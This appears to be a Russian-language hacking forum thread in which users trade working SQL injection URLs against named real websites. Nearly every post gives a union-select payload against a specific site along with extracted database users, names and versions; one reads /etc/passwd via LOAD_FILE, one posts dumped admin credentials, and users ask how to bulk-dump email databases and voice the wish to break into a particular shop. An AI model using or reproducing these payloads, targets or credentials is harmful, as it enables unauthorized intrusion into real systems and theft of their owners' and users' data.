SQL Инъекции

Магазин велосипедов

Code:

http://www.velo-mag.ru/index.php?action=page&id=-12345+union+select+1,2,3,4,5,6,7,8/*

USER: assortif_velo@localhost
DATABASE: assortif_velo
VERSION: 5.0.24a

18 таблиц: stella_pages, stella_news, fb_pages, VIEWS, USER_PRIVILEGES, TRIGGERS, TABLE_PRIVILEGES, TABLE_CONSTRAINTS, TABLES,
STATISTICS, SCHEMA_PRIVILEGES, SCHEMATA, ROUTINES, KEY_COLUMN_USAGE, COLUMN_PRIVILEGES, COLUMNS, COLLATION_CHARACTER_SET_APPLICABILITY, COLLATIONS, CHARACTER_SETS.

Code:

http://www.ik-ki.nl/?id=14&subid=30&action=bekijk&nieuws=-12345+union+select+1,2,3,4/*

USER: ikki_ikki@localhost
DATABASE: ikki_db
VERSION: 4.1.22

Code:

http://www.icppc.pl/pl/index.php?id=-12345+union+select+1,2,3/*

После запроса появляются еще ошибки, поэтому чуть не упустил из виду, что отображается 3 поле.

USER: icppc_jakub@localhost
DATABASE: icppc_jakub
VERSION: 4.1.21-standard-log

 

www.e1.ru:
/etc/passwd/
http://www.e1.ru/business/conference/yarmarka/read.php?theme=-1&question=-1'+union+select+1,2,3,4,LOAD_FILE(CHAR(47,101,116,99,47,112,97,115,115,119,100))/*
www.sermet.ru:
http://www.sermet.ru/index.php?idpage=2&idnews=-1+union+select+1,2,3,4,5+from+users/*
admin:admin
pass:140108

 

www.uph.ru:
http://www.uph.ru/inner.php?page=reklama1&top=-1+union+select+1,2/*
www.rns-soft.ru:
http://www.rns-soft.ru/?action=projects&id=-1+union+select+1,2,3,4+from+news/*

 

привет., у меня такая проблема, я пока в скьюэл не очень, поэтому не могу понять как получить доступ к базе мыл сайта:
ну есть сайт допустим сайт www.xxxxx.com с бажным скриптом, в строке URL ввожу :. www.xxxxx.com/index.php?l=2&id=-1+union+select+1,aes_decrypt(aes_encrypt(email,0x7 1),0x71)+from+users+limit+40000,1/*&s=3 вот ето, но он выдает ток по 1 мылу, в зависимости от того что ввел перед
,1/*&s=3. Например ввожу перед ,1/*&s=3 число 10000 выдает одно мыло , ввожу перед ,1/*&s=3 число 40000 выдает другое, и тд, но по 1, а как сделать чтоб всю базу просмотреть? или выкачать, может что то добавить к етому коду?

 

Code:

http://www.bayraktaremlakinsaat.com/index.php?detay=detaylar&x=&id=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2   4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*

USER: bayrakta_admin@localhost
DATABASE: bayrakta_emlakdb
VERSION: 4.1.21-standard

Code:

http://www.ta.fi/kohde_aso/?id=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

USER: webigurut@localhost
DATABASE: kampat
VERSION: 4.1.21-log

 

кинь линк...на сайт...

 

Что-то не получается.(( Может что не то делаю?

 

Code:

http://www.cdrlabs.com/articles/index.php?articleid=-3+union+select+concat_ws(0x3a,username,password)+from+users+limit+1,1

 

http://forum.antichat.ru/thread41560.html

 

ух ты ошибка.
мда

а здесь ваще пусто пошло))

 

фр

 

толстая кошка 0_о

 

herb4all.ru

Code:

http://www.herb4all.ru/index.php?group=1000+union+select+version()1,2,3,4/*

Нету сил копать дальше

 

belexpocentr.ru

Code:

http://www.belexpocentr.ru/show.php?id=-1+union+select+1,2,3,4,5,user(),7,database(),version(),10,11,12,13,14,15,16,17,18,19,20,21/*

 

C ХЕРболайфом тоже не получается(((
_http://www.herb4all.ru/index.php?group=-1000+union+select+concat(name,0x3a,password)+from+users/*
Пустая страница((( а так хочеться именно его взломать.

Блин там один столбец!!!

 

На самом деле столбцов семь.

 

Code:

http://gazeta.etatar.ru/base/person.php?id_person=-1+union+select+1,2,3,4,concat_ws(0x3b,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16/*

Code:

http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,concat_ws(0x3b,user(),database(),version())/*

 

не скуль, но чисто прикольно. алерт вылетает, первый раз вижу

 

тут тож стопор

 

Вот так вот, дальше сам смотри.